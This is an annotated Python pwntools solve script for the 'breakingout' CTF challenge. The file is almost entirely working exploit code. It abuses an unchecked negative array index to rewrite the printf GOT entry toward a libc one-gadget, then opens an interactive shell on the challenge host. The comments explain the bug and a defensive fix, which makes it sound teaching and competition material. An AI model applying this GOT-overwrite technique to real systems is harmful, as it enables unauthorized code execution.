#coding: utf-8
# CTF solve script for the "breakingout" challenge (the remote() target below).
# Bug class in play: an unchecked negative array index into `mem` (see the block
# comment just below), so a 4-byte write can land *before* the array -- here on
# the printf GOT slot. Defensive fix on the target side: reject negative and
# out-of-range indices, and link with full RELRO so the GOT is read-only after load.
from pwn import *
context.clear(arch='amd64')  # pwntools packing context; switched to i386 below to emit 32-bit cells
'''
vul: negative index
printfGOT += (magic - printfGOT)
x = (magic - printfGOT)
mem[1] = 1 (+), mem[2] = -22 (a), mem[3] = 5 (b), mem[4] = -22 (c), mem[5] = x
'''
# NOTE(review): the block comment above writes the delta as `magic - printfGOT`,
# while the code computes `magic3_1 - printf` (two libc offsets); it reads as
# shorthand for the same relative-write idea -- confirm against the binary.
# Binary-relative offsets; these look like PIE offsets (mainSam below is the
# usual 0x5555... load address seen under a debugger) -- not verifiable here.
main = 0xDE5
putsGOT = 0x202018
printfGOT = 0x202028
# libc offset of printf; appears to pair with the libc-2.26 offsets below
# (the disabled libc-2.23 block carries its own value).
printf = 0x5CD90
mem = 0x202080
# Why -22: indexing `mem` as 4-byte cells, 0x202080 + (-22 * 4) == 0x202028 == printfGOT,
# which is why -22 appears twice in the payload below.
putsDataSam = 0x0000555555554696  # presumably sample runtime addresses from a debug session; unused below
mainSam = 0x0000555555554000
#remote: libc-2.26.so:
# Candidate libc offsets tried against the remote libc; only magic3_1 is used below.
magic1 = 0x47C9A
magic2 = 0x7838E
magic3 = 0xD9763
magic3_1 = 0xD9880 # WPI{Now_to_break_out_of_third_place}
magic3_2 = 0xD9A3C
magic3_3 = 0x0D9A5C
magic4 = 0xFCCDE
magic4_1 = 0xFDB8E
magic6 = 0xFDB95
'''
#local: libc-2.23.so:
magic1 = 0x4526A
printf = 0x55800
magic2 = 0x6F5A6
magic3 = 0xCD0F3
magic4 = 0xCD1C8
magic5 = 0xF02A4
magic6 = 0xF1147 ## success
magic7 = 0xF66F0
'''
# Payload cells, following the layout in the block comment at the top:
# cell 1 is labelled '+' there (its meaning is not visible in this script),
# cells 2 and 4 (-22) select the printf GOT slot (see the arithmetic above),
# cell 3 is 5, and cell 5 is the delta added to the GOT entry (magic3_1 - printf,
# i.e. a libc-relative distance, so the libc base need not be known).
mem = [1, 1, -22, 5, -22, magic3_1-printf]  # NOTE: rebinds `mem`, shadowing the address constant above
context.clear(arch='i386')
payload = flat(mem) # to get 32bit integer
context.clear(arch='amd64')
# p = process('./breakingout')
p = remote('breakingout.wpictf.xyz', 31337)
# raw_input('w')
p.sendlineafter('(max 262144):', str(len(payload)))  # the service prompts for a byte count first
p.sendafter('teread', payload)  # presumably it then reads that many bytes into the array -- confirm
p.interactive()